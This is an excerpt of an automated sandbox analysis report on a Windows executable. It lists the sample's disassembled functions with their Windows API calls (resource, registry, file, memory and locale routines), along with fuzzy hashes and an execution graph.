                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                  • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                  • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                  • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                  Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCloseHandleModuleProc
                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                  • API String ID: 4190037839-2401316094
                                                                  • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                  • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                  Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                  • String ID:
                                                                  • API String ID: 1694776339-0
                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                  Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                    • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$DefaultSystem
                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 1044490935-665933166
                                                                  • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                  • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                  • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                  • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                  Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                  • LocalFree.KERNEL32(006EF6D0,00000000,00401AB4), ref: 00401A1B
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,006EF6D0,00000000,00401AB4), ref: 00401A3A
                                                                  • LocalFree.KERNEL32(006F06D0,?,00000000,00008000,006EF6D0,00000000,00401AB4), ref: 00401A79
                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID:
                                                                  • API String ID: 3782394904-0
                                                                  • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                  • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                  • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                  • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                  Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ExitMessageProcess
                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                  • API String ID: 1220098344-1503883590
                                                                  • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                  • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                  • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                  • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                  Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 262959230-0
                                                                  • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                  • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                  Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID:
                                                                  • API String ID: 730355536-0
                                                                  • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                  • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                  Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID: )q@
                                                                  • API String ID: 3660427363-2284170586
                                                                  • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                  • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                  • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                  • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                  Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                  • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CommandHandleLineModule
                                                                  • String ID: U1hd.@
                                                                  • API String ID: 2123368496-2904493091
                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                  Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                  • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                  Execution Graph

                                                                  Execution Coverage:16.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:4%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:69
                                                                  execution_graph 49749 402584 49750 402598 49749->49750 49751 4025ab 49749->49751 49779 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49750->49779 49753 4025c2 RtlEnterCriticalSection 49751->49753 49754 4025cc 49751->49754 49753->49754 49765 4023b4 13 API calls 49754->49765 49755 40259d 49755->49751 49757 4025a1 49755->49757 49758 4025d5 49759 4025d9 49758->49759 49766 402088 49758->49766 49761 402635 49759->49761 49762 40262b RtlLeaveCriticalSection 49759->49762 49762->49761 49763 4025e5 49763->49759 49780 402210 9 API calls 49763->49780 49765->49758 49767 40209c 49766->49767 49768 4020af 49766->49768 49787 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49767->49787 49769 4020c6 RtlEnterCriticalSection 49768->49769 49771 4020d0 49768->49771 49769->49771 49776 402106 49771->49776 49781 401f94 49771->49781 49772 4020a1 49772->49768 49773 4020a5 49772->49773 49773->49776 49776->49763 49777 4021f1 RtlLeaveCriticalSection 49778 4021fb 49777->49778 49778->49763 49779->49755 49780->49759 49782 401fa4 49781->49782 49783 401fd0 49782->49783 49786 401ff4 49782->49786 49788 401f0c 49782->49788 49783->49786 49793 401db4 49783->49793 49786->49777 49786->49778 49787->49772 49797 40178c 49788->49797 49791 401f29 49791->49782 49794 401e02 49793->49794 49795 401dd2 49793->49795 49794->49795 49820 401d1c 49794->49820 49795->49786 49801 4017a8 49797->49801 49799 4017b2 49816 401678 VirtualAlloc 49799->49816 49801->49799 49802 40180f 49801->49802 49805 401803 49801->49805 49808 4014e4 49801->49808 49817 4013e0 LocalAlloc 49801->49817 49802->49791 49807 401e80 9 API calls 49802->49807 49804 4017be 49804->49802 49818 4015c0 VirtualFree 49805->49818 49807->49791 49809 4014f3 VirtualAlloc 49808->49809 49811 401520 49809->49811 49812 401543 49809->49812 49819 401398 LocalAlloc 49811->49819 49812->49801 49814 40152c 49814->49812 49815 401530 VirtualFree 49814->49815 49815->49812 49816->49804 49817->49801 49818->49802 49819->49814 49821 401d2e 49820->49821 49822 401d51 49821->49822 49823 401d63 49821->49823 49833 401940 49822->49833 49824 401940 3 API calls 49823->49824 49826 401d61 49824->49826 49827 401d79 49826->49827 49843 401bf8 9 API calls 49826->49843 49827->49795 49829 401d88 49830 401da2 49829->49830 49844 401c4c 9 API calls 49829->49844 49845 401454 LocalAlloc 49830->49845 49834 401966 49833->49834 49842 4019bf 49833->49842 49846 40170c 49834->49846 49838 401983 49839 40199a 49838->49839 49851 4015c0 VirtualFree 49838->49851 49839->49842 49852 401454 LocalAlloc 49839->49852 49842->49826 49843->49829 49844->49830 49845->49827 49847 401743 49846->49847 49848 401783 49847->49848 49849 40175d VirtualFree 49847->49849 49850 4013e0 LocalAlloc 49848->49850 49849->49847 49850->49838 49851->49839 49852->49842 53497 40d064 53498 40d06c 53497->53498 53499 40d096 53498->53499 53500 40d09a 53498->53500 53501 40d08f 53498->53501 53503 40d0b0 53500->53503 53504 40d09e 53500->53504 53510 406288 GlobalHandle GlobalUnlock GlobalFree 53501->53510 53511 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 53503->53511 53509 40625c GlobalAlloc GlobalLock 53504->53509 53507 40d0ac 53507->53499 53512 408cac 53507->53512 53509->53507 53510->53499 53511->53507 53513 408cb8 53512->53513 53520 406ddc LoadStringA 53513->53520 53516 403450 4 API calls 53517 408ce9 53516->53517 53518 403400 4 API calls 53517->53518 53519 408cfe 53518->53519 53519->53499 53521 4034e0 4 API calls 53520->53521 53522 406e09 53521->53522 53522->53516 53523 44b4a0 53524 44b4ae 53523->53524 53526 44b4cd 53523->53526 53524->53526 53527 44b384 53524->53527 53528 44b3b7 53527->53528 53538 414ae0 53528->53538 53530 44b3ca 53531 44b3f7 73A1A570 53530->53531 53532 40357c 4 API calls 53530->53532 53542 41a1e0 53531->53542 53532->53531 53535 44b428 53550 44b0b8 53535->53550 53537 44b43c 73A1A480 53537->53526 53539 414aee 53538->53539 53540 4034e0 4 API calls 53539->53540 53541 414afb 53540->53541 53541->53530 53543 41a2a7 53542->53543 53544 41a20b 53542->53544 53545 403400 4 API calls 53543->53545 53547 403520 4 API calls 53544->53547 53546 41a2bf SelectObject 53545->53546 53546->53535 53548 41a263 53547->53548 53549 41a29b CreateFontIndirectA 53548->53549 53549->53543 53551 44b0cf 53550->53551 53552 44b162 53551->53552 53553 44b0e2 53551->53553 53554 44b14b 53551->53554 53552->53537 53553->53552 53556 402648 4 API calls 53553->53556 53555 44b15b DrawTextA 53554->53555 53555->53552 53557 44b0f3 53556->53557 53558 44b111 MultiByteToWideChar DrawTextW 53557->53558 53559 402660 4 API calls 53558->53559 53560 44b143 53559->53560 53560->53537 53561 448720 53562 448755 53561->53562 53563 44874e 53561->53563 53564 448769 53562->53564 53565 448524 7 API calls 53562->53565 53567 403400 4 API calls 53563->53567 53564->53563 53566 403494 4 API calls 53564->53566 53565->53564 53569 448782 53566->53569 53568 4488ff 53567->53568 53570 4037b8 4 API calls 53569->53570 53571 44879e 53570->53571 53572 4037b8 4 API calls 53571->53572 53573 4487ba 53572->53573 53573->53563 53574 4487ce 53573->53574 53575 4037b8 4 API calls 53574->53575 53576 4487e8 53575->53576 53577 431bc8 4 API calls 53576->53577 53578 44880a 53577->53578 53579 431c98 4 API calls 53578->53579 53586 44882a 53578->53586 53579->53578 53580 448880 53593 44232c 53580->53593 53581 448868 53581->53580 53605 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53581->53605 53585 4488b4 GetLastError 53606 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53585->53606 53586->53581 53604 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53586->53604 53588 4488c3 53607 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53588->53607 53590 4488d8 53608 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53590->53608 53592 4488e0 53594 442365 53593->53594 53595 44330a 53593->53595 53596 403400 4 API calls 53594->53596 53597 403400 4 API calls 53595->53597 53598 44236d 53596->53598 53599 44331f 53597->53599 53600 431bc8 4 API calls 53598->53600 53599->53585 53602 442379 53600->53602 53601 4432fa 53601->53585 53602->53601 53609 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53602->53609 53604->53586 53605->53580 53606->53588 53607->53590 53608->53592 53609->53602 53610 4165e4 73A25CF0 53611 42e3e7 SetErrorMode 49853 44138c 49854 441395 49853->49854 49855 4413a3 WriteFile 49853->49855 49854->49855 49856 4413ae 49855->49856 53612 40cee8 53613 40cef5 53612->53613 53614 40cefa 53612->53614 53616 406f38 CloseHandle 53613->53616 53616->53614 49857 490f80 49858 490fba 49857->49858 49859 490fbc 49858->49859 49860 490fc6 49858->49860 50057 409088 MessageBeep 49859->50057 49862 490ffe 49860->49862 49863 490fd5 49860->49863 49868 49100d 49862->49868 49869 491036 49862->49869 49865 446ff0 18 API calls 49863->49865 49867 490fe2 49865->49867 50058 406ba0 49867->50058 49872 446ff0 18 API calls 49868->49872 49878 49106e 49869->49878 49879 491045 49869->49879 49875 49101a 49872->49875 50066 406bf0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49875->50066 49885 49107d 49878->49885 49886 491096 49878->49886 49881 446ff0 18 API calls 49879->49881 49880 491025 50067 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49880->50067 49882 491052 49881->49882 50068 406c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49882->50068 50070 407270 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49885->50070 49891 4910ca 49886->49891 49892 4910a5 49886->49892 49887 49105d 50069 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49887->50069 49890 491085 50071 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49890->50071 49897 4910d9 49891->49897 49898 491102 49891->49898 49894 446ff0 18 API calls 49892->49894 49895 4910b2 49894->49895 50072 407298 49895->50072 49900 446ff0 18 API calls 49897->49900 49903 49113a 49898->49903 49904 491111 49898->49904 49899 4910ba 50075 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49899->50075 49902 4910e6 49900->49902 50076 42c7fc 49902->50076 49911 491149 49903->49911 49912 491186 49903->49912 49906 446ff0 18 API calls 49904->49906 49908 49111e 49906->49908 50086 4071e8 8 API calls 49908->50086 49914 446ff0 18 API calls 49911->49914 49918 4911be 49912->49918 49919 491195 49912->49919 49913 491129 50087 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49913->50087 49915 491158 49914->49915 49917 446ff0 18 API calls 